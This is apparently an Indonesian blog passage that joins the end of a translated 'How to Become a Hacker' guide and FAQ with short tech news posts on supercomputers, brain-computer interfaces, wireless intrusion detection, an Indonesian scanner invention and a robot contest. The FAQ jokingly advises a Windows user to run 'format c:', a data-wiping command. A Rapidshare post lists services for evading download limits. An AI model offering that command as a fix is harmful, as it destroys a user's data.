Mereka yang melakukan hal-hal seperti dengan baik juga dihormati, karena orang tahu bahwa pekerjaan seperti ini menghabiskan banyak waktu dan kalah mengasyikkan dibanding bermain dengan kode. Melakukan pekerjaan seperti ini menunjukkan bahwa seseorang memiliki dedikasi.

5.5 Mengabdi kepada budaya hacker itu sendiri.
Terakhir, Anda dapat mengabdi dan menyebarluaskan budaya hacker (lewat, misalnya, menulis panduan tepat bagi pemula tentang cara menjadi seorang hacker :-)). Anda tidak bisa melakukan hal ini kecuali telah berkecimpung cukup lama dan menjadi figur yang cukup terkenal di salah satu dari empat hal sebelumnya.

Budaya hacker tidak persis memiliki pemimpin, tapi memiliki pahlawan, tetua suku, sejarawan, dan para jubir. Jika Anda telah cukup lama berada di 'medan tempur', Anda dapat saja memperoleh salah satu dari jabatan-jabatan ini. Peringatan: hacker tidak mempercayai ego tetua suku yang terlampau mencolok, jadi berbahaya jika Anda terlalu terlihat untuk berusaha menjadi terkenal. Cara yang benar seharusnya yaitu dengan memposisikan diri sedemikian rupa sehingga jabatan tersebut jelas telah Anda capai, lalu kemudian bersikap rendah hati dan ramah sehubungan dengan kedudukan Anda tersebut.

6. Hubungan Hacker/Orang Nyentrik2
Bertentangan dengan mitos populer, tidak perlu menjadi orang nyentrik untuk menjadi hacker. Meski itu sebetulnya membantu, dan pada kenyataannya banyak hacker yang merupakan orang nyentrik. Menjadi orang yang tersisih secara sosial membantu Anda tetap memusatkan perhatian pada hal-hal yang benar-benar penting, seperti berpikir dan hacking.

Karena alasan ini, banyak hacker mengadopsi label 'nerd' dan bahkan menggunakan istilah yang lebih kasar 'geek' sebagai lencana kebanggaan -- cara memproklamasikan kebebasan dari tuntutan sosial. Lihatlah The Geek Page untuk pembahasan menyeluruh.

Bila Anda tetap dapat memusatkan perhatian pada hacking sampai menjadi cukup ahli dan tetap memiliki kegiatan sosial, itu sah-sah saja. Hal ini memang lebih mudah dilakukan sekarang ketimbang waktu saya seorang pemula di tahun 1970-an; budaya mainstream saat ini jauh lebih ramah pada para techno-nerd. Malah kini semakin banyak orang yang menyadari bahwa hacker kadang merupakan kekasih yang berkualitas dan calon pasangan hidup potensial. Lebih lanjut tentang hal ini, lihat Girl's Guide to Geek Guys.

Bila ketertarikan Anda pada hacking adalah karena Anda tidak mempunyai kegiatan lain, itu juga tidak apa-apa -- setidaknya tidak perlu susah-susah memusatkan perhatian. Mudah-mudahan satu hari nanti Anda akan memperoleh kehidupan sosial.

7. Panduan Gaya
Saya ulangi, untuk menjadi hacker, Anda perlu memasuki cara pikir hacker. Hal-hal tertentu yang Anda lakukan saat jauh dari komputer kadang membantu mencapainya. Tentu saja kegiatan-kegiatan ini bukan sebagai pengganti hacking (tak ada yang dapat menggantikan hacking) tapi banyak hacker melakukannya, dan merasa bahwa kegiatan tersebut secara dasar berhubungan dengan intisari hacking.

Membaca karya fiksi ilmiah. Datang ke pertemuan fiksi ilmiah (salah satu jalan yang bagus untuk bertemu hacker dan proto-hacker).
Mempelajari Zen, dan/atau berlatih bela diri. (Disiplin mental yang diajarkan serupa dengan hacking dalam hal-hal penting.)
Mengasah pendengaran musik. Belajar menghargai jenis-jenis musik yang tidak lazim. Belajar menjadi ahli dalam bermain alat musik tertentu, atau berlatih bernyanyi.
Mengembangkan apresiasi akan permainan kata.
Belajar menulis dalam bahasa asli (Sejumlah banyak hacker, termasuk semua hacker terbaik yang saya kenal, adalah penulis yang cakap).
Semakin banyak dari hal-hal di atas yang sudah Anda kerjakan, semakin besar kemungkinan Anda adalah calon hacker berbakat. Kenapa hal-hal di atas yang berhubungan dengan hacking tidak sepenuhnya jelas, tapi semuanya berkaitan dengan gabungan kemampuan otak kiri dan kanan yang penting (hacker harus dapat berpikir logis dan juga sewaktu-waktu harus dapat melangkah keluar dari logika umum suatu permasalahan).

Terakhir, sebagian dari hal-hal yang tidak sebaiknya dilakukan:

Jangan menggunakan ID atau nama samaran yang konyol atau berlebihan.
Jangan terlibat perang flame di Usenet (atau di mana pun).
Jangan menggelari diri 'cyberpunk', jangan berurusan dengan para 'cyberpunk'.
Jangan mengirim posting atau email yang penuh salah ketik dan bertata bahasa buruk.
Satu-satunya reputasi yang akan Anda dapatkan jika melakukan hal-hal di atas adalah sebagai orang dungu. Ingatan hacker biasanya bagus -- mungkin dibutuhkan bertahun-tahun lamanya sebelum Anda dapat diterima kembali.

8. Bacaan Lain
Peter Seebach mengurus dokumen bagus Hacker FAQ bagi para manajer yang tidak tahu bagaimana harus berhadapan dengan para hacker.

Di Loginataka terdapat beberapa keterangan tentang latihan dan cara bersikap seorang hacker Unix yang benar.

Saya juga menulis A Brief History Of Hackerdom.

Saya menulis sebuah paper, The Cathedral and the Bazaar, yang menjelaskan banyak tentang cara kerja Linux dan budaya open-source. Topik ini saya bahas lebih tegas dalam kelanjutan paper tersebut, Homesteading the Noosphere.

Rick Moen menulis dokumen yang bagus tentang cara mengoperasikan kelompok pengguna Linux.

9. Tanya Jawab (FAQ)
T: Maukah Anda mengajari saya cara hacking?

J: Sejak pertama kali halaman ini diterbitkan online, setiap minggu (kadang setiap hari) saya mendapatkan beberapa permintaan dari orang agar saya 'mengajari hacking dari A-Z'. Sayangnya, saya tidak memiliki waktu atau tenaga untuk ini; proyek-proyek hacking saya telah menghabiskan 110% dari waktu saya.

Meski toh saya ajarkan, hacking adalah sikap dan kemampuan yang pada dasarnya harus dipelajari sendiri. Anda akan menyadari bahwa meskipun para hacker sejati bersedia membantu, mereka tidak akan menghargai Anda jika Anda minta disuapi segala hal yang mereka ketahui.

Pelajari dulu sedikit hal. Tunjukkan bahwa Anda telah berusaha, bahwa Anda mampu belajar mandiri. Barulah ajukan pertanyaan-pertanyaan spesifik pada hacker yang Anda jumpai.

Jika toh Anda mengirim email pada seorang hacker untuk meminta nasihat, ketahuilah dahulu dua hal. Pertama, kami telah menemukan bahwa orang-orang yang malas dan sembrono dalam menulis biasanya terlalu malas dan sembrono dalam berpikir sehingga tidak cocok menjadi hacker -- karena itu usahakanlah mengeja dengan benar, dan gunakan tata bahasa dan tanda baca yang baik, atau Anda tidak akan diacuhkan. Kedua, jangan berani-berani meminta agar jawaban dikirim ke alamat email lain yang berbeda dari alamat tempat Anda mengirim email; kami menemukan orang-orang ini biasanya pencuri yang memakai account curian, dan kami tidak berminat menghargai pencuri.

T: Jadi bagaimana cara memulai?

J: Cara terbaik adalah barangkali mengunjungi pertemuan KPLI (kelompok pengguna Linux) setempat. Anda dapat menemukan kelompok yang dimaksud di LDP General Linux Information Page; mungkin ada satu yang di dekat Anda, kemungkinan terkait dengan sebuah sekolah atau universitas. Anggota KPLI kemungkinan akan memberi Anda Linux jika Anda meminta, dan sudah pasti akan menolong Anda menginstall Linux dan mulai memakainya.

T: Kapan saya harus mulai? Apakah sudah terlambat?

J: Di usia mana pun saat Anda mulai termotivasi, itu usia yang baik. Kebanyakan orang mulai tertarik di usia 15 s.d. 20, tapi banyak perkecualian (lebih tua maupun lebih muda).

T: Berapa lama waktu yang dibutuhkan untuk belajar hacking?

J: Bergantung seberapa besar bakat dan usaha Anda. Kebanyakan orang memperoleh keahlian yang cukup dalam delapan belas bulan atau dua tahun, jika mereka berkonsentrasi. Tapi jangan pikir setelah itu selesai; jika Anda hacker sejati, Anda akan menghabiskan sisa waktu belajar dan menyempurnakan keahlian.

T: Apakah Visual Basic atau Delphi bahasa permulaan yang bagus?

J: Tidak, karena mereka tidak portabel. Belum ada implementasi open-source dari bahasa-bahasa ini, jadi Anda akan terkurung di platform yang dipilih oleh vendor. Menerima situasi monopoli seperti itu bukanlah cara hacker.

Visual Basic amat jelek. Fakta bahwa bahasa ini proprietary dari Microsoft sudah cukup untuk mendiskualifikasikannya, dan seperti halnya Basic-Basic yang lain, bahasa ini didisain dengan jelek dan akan mengajarkan kepada Anda kebiasaan-kebiasaan memrogram yang jelek.

T: Maukah Anda membantu saya meng-crack sistem ini, atau mengajari saya cara cracking?

J: Tidak. Jika orang masih mengajukan pertanyaan bodoh seperti di atas setelah membaca tulisan ini, berarti dia terlalu bodoh untuk dididik, meskipun saya memiliki waktu untuk mendidiknya. Setiap email kepada saya dengan permintaan semacam ini akan diabaikan atau dijawab dengan amat kasar.

T: Bagaimana cara mendapatkan password account orang lain?

J: Tanya langsung kepada orang tersebut, hei bung?kalau anda minta kepada saya cara membajak password tersebut Ini namanya cracking. Pergi sana, bodoh.

T: Bagaimana cara menembus/membaca/memonitor email orang lain?

J: Apalagi yang ini, jelas sekali kalau ini cracking. Jauh-jauh sana, goblok.

T: Bagaimana cara mencuri privilege op chanel di IRC?

J: Ini cracking. Enyah kau, cretin. (Catatan: lihat Jargon File).

T: Saya dicrack. Maukah Anda menolong saya mencegah serangan berikutnya?

J: Tidak. Setiap kali saya ditanya pertanyaan di atas sejauh ini, ternyata penanyanya seseorang yang menggunakan Microsoft Windows. Tidak mungkin secara efektif melindungi sistem Windows dari serangan crack; kode dan arsitektur Windows terlalu banyak mengandung cacat, sehingga berusaha mengamankan Windows seperti berusaha menyelamatkan kapal yang bocor dengan saringan. Satu-satunya cara pencegahan yang andal adalah berpindah ke Linux atau sistem operasi lain yang setidaknya dirancang untuk keamanan.

T: Saya mengalami masalah dengan software Windows saya. Maukah Anda menolong?

J: Ya. Buka DOS prompt dengan ketikkan "format c:". Jreenngg Semua masalah yang Anda alami akan lenyap dalam beberapa menit.

T: Di mana tempat untuk bertemu dengan para hacker asli dan mengobrol dengan mereka?

Jalan terbaik yaitu dengan mencari kelompok pengguna Unix atau Linux di daerah Anda dan pergi ke pertemuan rutin mereka (sebagian daftar kelompok pengguna ini bisa dilihat di halaman LDP di Sunsite).

(Dulu saya pernah berkata bahwa di IRC Anda tidak akan berjumpa dengan hacker sejati, tapi sekarang saya mengerti bahwa kenyataan ini telah berubah. Nampaknya komunitas para hacker sejati, yang berhubungan dengan hal-hal seperti GIMP dan Perl, telah memiliki channel IRC masing-masing).

T: Bisakah Anda menganjurkan buku-buku yang berguna seputar hacking?

J: Saya memaintain Linux Reading List HOWTO yang mungkin berguna bagi Anda. Loginataka juga barangkali menarik buat Anda.

T: Apakah matematika saya harus bagus untuk menjadi hacker?

J: Tidak. Meskipun Anda perlu dapat berpikir logis dan mengikuti rantai pemikiran eksak, hacking hanya menggunakan sedikit sekali matematika formal atau aritmetika.

Anda terutama tidak perlu kalkulus atau analisis (kita serahkan itu kepada para insinyur elektro :-)). Sejumlah dasar di matematika finit (termasuk aljabar Bool, teori himpunan hingga, kombinasi, dan teori graph) berguna.

T: Bahasa apa yang pertama-tama harus saya pelajari?

J: HTML, bila Anda belum menguasainya. Ada banyak buku HTML yang jelek, dengan sampul mengkilap dan penuh dengan kata-kata berlebih, sementara amat disayangkan jumlah buku yang bagus sedikit. Satu yang paling saya sukai yaitu HTML: The Definitive Guide.

Tapi HTML bukan bahasa pemrograman penuh. Bila Anda telah siap untuk memrogram, saya sarankan mulai dengan Python. Anda akan mendengar banyak orang menyarankan Perl, dan Perl saat ini masih lebih populer ketimbang Python, tapi Perl lebih sulit dipelajari.

Bahasa C amat penting, tapi juga jauh lebih sulit daripada Python atau Perl. Jangan langsung belajar C untuk pertama kali.

T: Hardware seperti apa yang saya butuhkan?

J: Komputer pribadi (PC, personal computer) dulu kurang memiliki daya komputasi dan memori sedikit, sehingga membatasi proses belajar hacker. Sudah agak lama kenyataannya tidak lagi demikian. Setiap mesin mulai dari 486DX50 ke atas sudah lebih dari cukup untuk development, X, dan komunikasi Internet, dan harddisk terkecil yang bisa Anda beli sekarang sudah cukup besar.

Yang penting dalam memilih hardware adalah apakah kompatibel dengan Linux (atau BSD, jika Anda memilih OS itu). Lagi-lagi, hardware modern kebanyakan kompatibel; yang masih kurang banyak kompatibel adalah modem dan printer; beberapa mesin mengandung hardware yang spesifik Windows dan tidak akan bekerja dengan Linux.

Ada FAQ tentang kompatibilitas hardware, versi terakhirnya ada di sini.

T: Apakah saya harus membenci dan menjelek-jelekkan Microsoft?

J: Tidak perlu. Bukannya Microsoft itu menjijikkan, tapi sudah ada budaya hacker jauh sebelum Microsoft dan juga akan ada nanti setelah Microsoft menjadi sejarah. Energi yang Anda berikan untuk membenci Microsoft barangkali lebih baik dikerahkan untuk mencintai pekerjaan Anda. Tulislah kode yang bagus -- itu yang akan cukup menjelekkan Microsoft tanpa mengotori karma Anda.

T: Tapi bukankah dengan software open-source programer tidak akan dapat memperoleh nafkah?

J: Kemungkinan besar tidak -- sejauh ini, industri software open-source justru menciptakan ketimbang menghilangkan lapangan pekerjaan. Jika ditulisnya suatu program akan menciptakan keuntungan bersih secara ekonomi, seorang programer tetap akan memperoleh bayaran terlepas dari apakah programnya itu akan menjadi program bebas atau tidak. Dan, terlepas dari sebanyak apa pun software ?bebas? yang telah ditulis, selalu ada kebutuhan akan aplikasi yang baru dan dibuat sesuai pesanan. Di halaman web Open Source, saya menulis lebih jauh tentang hal ini.

T: Bagaimana caranya mulai? Di mana saya bisa mendapatkan versi Unix bebas?

J: Di bagian lain tulisan ini saya telah memberi petunjuk tempatnya. Untuk menjadi hacker Anda memerlukan motivasi dan inisiatif dan kemampuan untuk belajar mandiri. Mulailah sekarang?

Footnote

1 Demigod, hacker yang telah memiliki pengalaman bertahun-tahun, memiliki reputasi kelas dunia, dan berperan penting dalam pengembangan rancangan, tool, atau game yang dipakai/dikenal oleh minimal separuh komunitas hacker (dari Jargon File 4.1.2).

2 Nerd, seseorang yang memiliki IQ di atas rata-rata, kurang mampu bercakap-cakap atau melakukan ritual sosial lainnya. (dari Jargon File 4.1.2).

10 KOMPUTER TERCEPAT DI PLANET BUMI

Inilah salahsatu lambang keunggulan bangsa-bangsa termaju di dunia. Mesin-mesin masa depan. Mesin-mesin paling powerful di dunia yang mampu melakukan kalkulasi-kalkulasi paling kompleks, hanya dalam sekejap mata.

Dari memonitor kesiapan dan ketahanan senjata-senjata nuklir Amerika, meramalkan cuaca dan gempa bumi dengan presisi tinggi, memetakan genome manusia yang sangat kompleks, dan tentu saja mempercepat akselerasi pengembangan teknologi-teknologi potensial terbaru.

Seberapa cepat kecepatan mesin-mesin ini? Superkomputer tercepat di dunia sekarang berada di Los Alamos New Mexico, Amerika, dibuat oleh perusahaan IBM, dan dinamakan ”Roadrunner”. Kecepatannya telah menembus 1 Petaflop pada 25 Mei 2008.

1 Petaflops, bukan 1 juta kalkulasi per detik, bukan 1 milyar kalkulasi per detik, dan, bukan 1 trilyun kalkulasi per detik. 1 Petaflop, adalah quadrillion kalkulasi per detik, atau 1.000 trilyun kalkulasi, perdetik. Roadrunner ditargetkan akan mencapai kecepatan puncak 1,7 Petaflops.

1 Teraflops = 1 trilyun kalkulasi per detik
1 Petaflops = 1.000 trilyun operasi per detik

Komputer Roadrunner ini lebih cepat 60.000 kali dibanding komputer pribadi tercepat saat ini. Harganya sekitar US$ 133 Juta. Satu fakta menarik, superkomputer ini memiliki struktur sel yang nyaris sama dengan mainan komputer anak-anak, Playstation 3. Roadrunner menggunakan prosesor Cell Broadband Engine™, atau Cell B.E. yang diciptakan IBM, Sony, dan Toshiba yang juga digunakan untuk Playstation, walaupun tentu saja dengan ”sedikit” modifikasi baru.

Inilah daftar dari komputer-komputer tercepat yang ada di dunia. Minimal yang bisa diketahui oleh publik. Banyak orang yakin, ada komputer-komputer rahasia yang dimiliki pemerintah Amerika yang keberadaannya tidak diketahui umum, dan kecepatannya bahkan jauh lebih cepat dari Roadrunner..

10 Komputer Tercepat di Dunia :

1. ROADRUNNER
BladeCenter QS22/LS21 Cluster, PowerXCell 8i 3.2 Ghz / Opteron DC 1.8 GHz , Voltaire Infiniband. Los Alamos National Laboratory, Amerika.

2. JAGUAR
Cray XT5 QC 2.3 GHz. Oak Ridge National Laboratory, Amerika.
3. PLEIADES
SGI Altix ICE 8200EX, Xeon QC 3.0/2.8 GHz. NASA/Ames Research Center, Amerika.

4. BLUEGENE/L
eServer Blue Gene Solution. Lawrence Livermore National Laboratory, Amerika.

5. INTREPID
Blue Gene/P Solution. Argonne National Laboratory, Amerika.
6. RANGER
SunBlade x6420, Opteron QC 2.3 Ghz, Infiniband. Texas Advanced Computing Center, Amerika.
7. FRANKLIN
Cray XT4 QuadCore 2.3 GHz. NERSC/LBNL, Amerika.
8. JAGUAR
Cray XT4 QuadCore 2.1 GHz. Oak Ridge National Laboratory, Amerika.
9. RED STORM
Sandia/ Cray Red Storm, XT3/4, 2.4/2.2 GHz dual/quad core. NNSA/Sandia National Laboratories, Amerika.
10. DAWNING 5000A
Dawning 5000A, QC Opteron 1.9 Ghz, Infiniband, Windows HPC 2008. Shanghai Supercomputer Center, China.

9 dari 10 komputer tercepat di dunia adalah milik Amerika. Komputer tercepat ke 10 di dunia, Dawning 5000, adalah komputer super milik China. Komputer ini berada di Shanghai Supercomputer Center (SSC), dikembangkan oleh lebih dari 500 ilmuwan China, dan biayanya hanya 1/4 Roadrunner, yaitu sekitar US$ 30 juta.

ITB Kembangkan Pengendali Komputer Pakai Otak

Bukan mustahil untuk mengoperasikan komputer, manusia cukup menggunakan pikiran tanpa bantuan tangan. Kenyataannya, otak manusia menghasilkan gelombang Alpha saat berkonsentrasi, dan bisa diterjemahkan dalam sinyal digital.

Penelitian untuk mewujudkan pengoperasian komputer dengan cara menangkap sinyal-sinyal dari otak, sudah dilakukan tim reaserch Sekolah Teknik Elektro dan Informatika (STEI) ITB. Tim ini terdiri dari Mahasiswa-mahasiswa S2 yang tergabung dalam grup riset bernama Digital Media and Game Center. Awal penelitian mereka lebih fokus untuk mengembangkan aplikasi-aplikasi yang sebagian besar berupa game edukasi.

Sinyal gelombang Alpha yang dihasilkan otak dalam bereaksi terhadap suatu kondisi dibaca oleh Teknologi Brain Computer Interface. Sinyal gelombang analog ini kemudian dikonversi ke biner untuk mengendalikan suatu objek di komputer tanpa menggunakan alat apapun.

Simulasi pembacaan perintah otak ini diuji coba dengan memasangkan suatu alat pendeteksi gelombang alpha pada kepala. Alat yang menggunakan sumber arus DC yang terukur, dikoneksikan ke komputer, dimana pengunjung mencoba untuk menggerakkan suatu balok dari suatu tempat ke tempat lainnya hanya dengan memikirkannya dalam otak. Dan ternyata objek-objek tersebut memang bergerak menurut keinginan pengunjung.

"Alat ini sebenarnya memiliki konsep awal untuk mengendalikan robot hanya melalui pikiran. Hanya dengan berkonsentrasi terhadap suatu objek dan perintah yang ingin kita berikan maka robot akan bereaksi sesuai dengan keinginan kita. Selain itu, alat ini juga dapat mendeteksi tingkat stress seseorang," ujar anggota tim reasearch Digital Media and Game Centre Hendra di stand STEI ITB dalam pameran Bandung Comtech di BeMall, Minggu (16/11/2008).

Beberapa aplikasi yang disuguhkan dalam pameran pertama tim ARAD, Magic Book and Volcanopedia, AR Flood, Flight Simulator, Tank Simulator dan games Sultan Agung. Beberapa aplikasi tersebut menerapkan konsep augmented reality, real time simulator, dan brain computer interface.

ARAD, Volcano dan AR FLood adalah aplikasi yang menerapkan konsep augmented reality. Aplikasi-aplikasi tersebut menampilkan sebuah dunia virtual dengan menggunakan kode-kode yang disebut marker. Marker ini dapat ditempatkan pada meja yang didesain khusus untuk AR maupun pada sebuah buku. Dengan memanfaatkan web cam, gambar-gambar 3D akan muncul dari permukaan meja ataupun buku yang memiliki marker di atasnya.

ARAD didesain khusus untuk para arsitektur dan pengembang real estate untuk mendesain blueprint yang dinamis dan fleksibel. Volcano adalah aplikasi yang dapat menampilkan gambar 3D dari gunung-gunung berapi di Indonesia beserta jenis letusan yang dimiliki. Aplikasi ini sangat menarik karena dari tampilan peta wilayah Indonesia pada magic book, akan muncul topografi dari masing-masing gunung ketika web cam diarahkan pada permukaan buku.

Sedangkan AR Flood memiliki kelebihan dalam hal menanggulangi kemungkinan banjir dengan pembangunan tanggul virtual pada daerah tertentu dalam peta. Setelah pambangunan tanggul selesai, simulasi banjir dilakukan kemudian akan ada analisa berapa kerusakan rumah yang ditimbulkan maupun korban jiwa dari peristiwa banjir tersebut.

Konsep real time simulator diterapkan pada tank simulator dan flight simulator dimana pengunjung dapat mencoba mengoperasikan suatu pesawat maupun tank. Kemudian akan ada penilaian terhadap keahlian mengemudi dari masing-masing pengunjung, apakah mereka lulus atau tidak dalam mengoperasikan suatu kendaraan.

Teknologi Baru Deteksi Penyelundup di Jaringan Wireless

Riset canggih yang dilakukan di Queensland University of Technologi (QUT) telah melahirkan sebuah sistem baru yang dapat mendeteksi penyelundup yang tidak terlihat di sebuah jaringan nirkabel.

Salah seorang peneliti sekuriti QUT Dr. Jason Smith mengatakan bahwa ia dan seorang mitranya telah menemukan sebuah sistem efektif untuk mendeteksi orang - orang yang tidak diundang di jaringan - jaringan nirkabel.

"Tidak seperti sebuah bangunan, tidak ada batas yang jelas di jaringan nirkabel. Perbatasan sebuah jaringan ditentukan oleh kualitas antena si penerima. Penyelundup dapat dengan mudah mengakses jaringan nirkabel dengan mencuri dengar data yang ada di jaringan tidak terenkripsi atau dengan secara aktif mencuri sesi komputer lain saat seorang pemakai yang sebenarnya meninggalkan jaringan," jelas Smith.

Smith mengatakan bahwa sistemnya adalah sebuah jendela ke dunia tak terlihat yang memungkinkan administrator jaringan melihat adanya hal yang tidak terduga atau tidak diinginkan di jaringannya.

Smith mengatakan bahwa mereka "telah menciptakan satu seri teknik monitoring yang apabila digunakan bersama - sama dapat dengan efektif menemukan penyerang dan kesalahan konfigurasi di alat - alat di jaringan. Monitor ini independen dari jaringan, tetapi menggunakan informasi yang dihasilkan oleh jaringan sehingga sistem ini dapat dipakai korporat dengan mudah dan murah."

"Baik kekuatan sinyal maupun waktu yang dibutuhkan sinyal untuk bergerak di sebuah jaringan nirkabel (round trip time atau RTT) dimonitor karena mereka akan berubah apabila seorang penyerang memasuki jaringan. Mengamati kekuatan sinyal dan RTT secara terpisah tidaklah akurat, akan tetapi membandingkan mereka satu sama lain membuat sisten ini akurat," jelas Smith.

Smith mengatakan bahwa saat seorang yang tidak memiliki otorisasi terdeteksi, beberapa hal dapat dilakukan "tergantung dari seberapa sensitifnya jaringan tersebut, penjaga bersenjata dapat didatangkan atau jaringan tersebut dapat dimatikan. Satu lagi aplikasi sistem ini adalah untuk menemukan kelemahan sekuriti di alat - alat yang terhubung ke jaringan. Saat sebuah konfigurasi sekuriti yang lemah terdeteksi, kesalahan ini dapat diperbaiki."

Smith mengatakan bahwa ia menciptakan sistem tersebut dengan seorang ahli riset Rupinder Gill yang saat ini dipekerjakan oleh seorang vendor jaringan nirkabel di Amerika untuk membuat produk sekuriti.

Trik Download di Rapidshare

Saya tau netter mania pasti pernah yang namanya download dari situs rapidshare, kalo sang netter tidak memiliki account rapidshare maka jatah untuk mendownloadnya cuma 1 kali, dan harus menunggu beberapa jam untuk bisa mendownloadnya kembali.

Sebelumnya saya sudah memberi tahu kepada anda cara untuk mendownload berulang kali pada situs rapidshare tetapi cara itu sedikit extreme yaitu mereset modem. trus bagaimana nasib para netter yang main di cyber cafe a.k.a warnet???

masih ada cara lain kok. ada beberapa situs yang menawarkan jasa untuk mendownload berualang-ulang dengan account premium yang mereka miliki, diantaranya :

1. http://www.hellorapid.com : jumlah download unlimit alias ga' ada batesnya, tetapi ukuran file yang boleh didownload max 60MB.

2. http://www.rsrip.com : Jumlah download dibatasi sebanyak 3x sehari (kaya' minum obat aja ya...) tetapi ukuran file tidak dibatasi alias bebas, 10 Gb juga bisa kok..

3. http://www.rapidl.com : Jumlah download dibatasi sebanyak 5x sehari tetapi ukuran file juga tidak dibatasi.

Silahkan pilih dari 3 situs tersebut, kalo file yang kalian download lebih kecil dari 60MB, gunakan No 1, dan sisanya tersarah anda...


udah dulu ya....silahkan berdownload ria...

Temuan Ilmuwan Muslim Indonesia Digunakan oleh NASA

Ilmuwan Indonesia menciptakan pemindai empat dimensi pertama di dunia. Laboratoriumnya hanya ruko sederhana. Sangat diperlukan untuk industri perminyakan. Teknologi tersebut adalah teknologi ECVT (electrical capacitance volume tomography). ECVT adalah sistem pemindai berbasis medan listrik statis yang mampu menghasilkan citra obyek volumetrik dan real time (seketika).

Pada dasarnya, teknologi ECVT adalah teknologi scanning atau fotokopi yang bisa melihat secara real time dan 3 dimensi gerak bahan di dalam boiler, reaktor industri, pipa, dsb, meskipun bertekanan dan bersuhu tinggi. Teknologi ECVT bisa diterapkan di berbagai bidang mulai dari bidang industri, kedokteran, pertambangan, proses kimia, body scan untuk keperluan security, pencitraan aktifitas di dalam gunung berapi atau semburan lumpur panas, dll.

Teknologi tersebut kini dipakai oleh Badan Antariksa Amerika Serikat atau National Aeronautics and Space Administration (NASA). “Guna penerapan pada pemindaian obyek dielektrika pada saat misi antariksanya,” demikian tulis editorial jurnal Industrial and Engineering Chemistry Research edisi Januari 2009, yang diterbitkan oleh American Chemical Society. NASA, dalam jurnalnya yang dipublikasikan di Measurement Science and Technology yang terbit di Inggris, menyatakan telah memanfaatkan teknologi ECVT untuk memindai keberadaan air di permukaan luar pelapis sistem pelindung panas pada dinding pesawat ulang-aliknya. Teknologi ECVT mampu menghasilkan citra volumetrik dan real time dari konsentrasi air yang terakumulasi pada dinding luar pesawat ulang-alik.

Adalah Dr. Warsito yang menemukan dan mengembangkan teknologi ECVT ini. Ilmuwan muslim dari Indonesia ini juga sebagai pemilik paten ECVT yang didaftarkan di dokumen paten AS. Dr. Warsito meraih gelar pendidikan S1 s.d S3 di Shizuoka University, Jepang. Dia adalah Ketua Masyarakat Ilmuwan dan Teknolog Indonesia (MITI) dan Ketua Dewan Penasehat Institute for Science and Technology Studies (Istecs). Pernah meraih penghargaan Tokoh Muda Indonesia (Gatra, 2003) dan meraih penghargaan Yang Mengubah Indonesia (Tempo, 2006). Dr. Warsito mengembangkan teknologi ECVT di Center for Tomography Research Laboratory (CTECH Labs), sebuah laboratorium pada ruang berukuran 5 x 8 meter di sebuah ruko berlantai dua di Tangerang. CTECH boleh saja disebut laboratorium “kelas ruko”, tapi karya yang dihasilkannya sungguh “berkualitas ekspor”. Betapa tidak, CTECH di bawah pimpinan Warsito berhasil menciptakan alat pemindai empat dimensi (4D) pertama di dunia. Karyanya itu diluncurkan pertama kali di Koffolt Laboratories, Department of Chemical and Biomolecular Engineering, Ohio State University, Columbus, Ohio, Amerika Serikat, November lalu.

Bangsa Indonesia harus bangga dengan temuan yang bisa diaplikasikan langsung secara luas di dunia industri ini. Temuan atas teknologi pencitraan secara 3 dimensi sempat menjadi headlines di media electronik maupun cetak yang menyangkut sains dan teknologi di seluruh dunia belum lama ini. Berita yang pertama kali dirilis oleh Ohio State Research News pada tanggal 27 Maret 2006 itu kemudian dikutip oleh ScienceDaily (AS), Scenta (Inggris), Chemical Online, Electronics Weekly dan hampir seluruh media pemberitaan iptek di segala bidang dari energi, kedokteran, fisika, biologi, kimia, industri, elektronika hingga nano-teknologi dan antariksa di seluruh dunia.

Tim Robot Indonesia Menang Kompetisi di San Francisco

Francisco - Tim Robot Indonesia dari Universitas Komputer Indonesia (UNIKOM) di Bandung berhasil meraih juara I dan memperoleh medali emas dalam 'International Robo Games' yang diselenggarakan di San Francisco, AS. Kompetisi Robot Internasional yang berlangsung selama 3 hari (12-14 Juni 2009) itu diperkirakan dihadiri sekitar 3.000 orang.

Demikian disampaikan Konsulat Jenderal Republik Indonesia (KJRI) di San Francisco dalam rilis yang diterima detikcom, Senin (15/6/2009). Kemenangan Indonesia diperoleh melalui penampilan Robot DU-114 yang meraih waktu tercepat dalam mencari sumber api dan memadamkannya dengan semprotan air secara otomatis (api diperagakan dengan menggunakan lilin).

Sedangkan Robot NEXT-116 karya mahasiswa UNIKOM lainnya, Stevanus Akbar, belum memperoleh medali. Meski demikian, Robot NEXT-116 ini merupakan satu-satunya robot yang menggunakan 8 kaki sebagai alat gerak (walking robot) yang ikut bertanding dalam kategori Open Fire Fighting Autonomous Robot tersebut.

Sedangkan robot-robot lainnya menggunakan roda/rantai sebagai alat gerak sehingga NEXT-116 disebut juri sebagai karya robot yang spektakuler untuk kategori tersebut.

Saat menerima medali emas Robo Games dari panitia penyelenggara di panggung kehormatan, Tim Robot Indonesia melambaikan bendera merah putih yang disambut dengan tepuk tangan meriah para penonton yang umumnya adalah warga AS. Kemenangan Tim Robot Indonesia tersebut juga diliput secara langsung oleh kru TV Voice of America (VOA) yang secara khusus datang dari Washington D.C.

Kemenangan ini patut dibanggakan mengingat Tim Robot Indonesia baru pertama kalinya bertanding di luar negeri. Tim dari Indonesia berhasil mengalahkan tim dari negara-negara maju, termasuk dari AS sendiri. Tim ini sebelumnya telah menjuarai Kompetisi Robot Cerdas Indonesia (KRCI) tingkat regional (Jawa-Barat, DKI Jakarta, dan Banten) dan tingkat nasional di Indonesia selama tahun 2007-2008.

Nama robot DU-114 diambil dari singkatan alamat kampus UNIKOM di Bandung (Jl Dipati Ukur No. 114, Bandung). Robot tersebut adalah hasil karya mahasiswa UNIKOM Rudi Hartono di bawah bimbingan Ketua Divisi Robotika UNIKOM Yusrila Yeka Kerlooza.

Tim Robot Indonesia yang terdiri dari Dr Aelina Surya (Purek III sebagai Ketua Tim), Dr Hj Ria Ratna Ariawati (Purek I), Yusrila Y Kerlooza (Ketua Divisi Robotika), Rudi Hartono (mahasiswa), dan Stevanus Akbar Alexander (mahasiswa) merencanakan kembali ke Indonesia pada hari Selasa, 16 Juni 2009, dan diharapkan tiba di Jakarta pada hari Kamis, 18 Juni 2009.
(sho/ddt)

Seluruh Desa di Indonesia akan Terkoneksi Internet pada Akhir 2009

Depkominfo mentargetkan pada akhir 2009 ini seluruh desa di Indonesia terkoneksi dengan internet. Sekitar 31000 desa di selauruh Indonesaia merupakan target program ini.

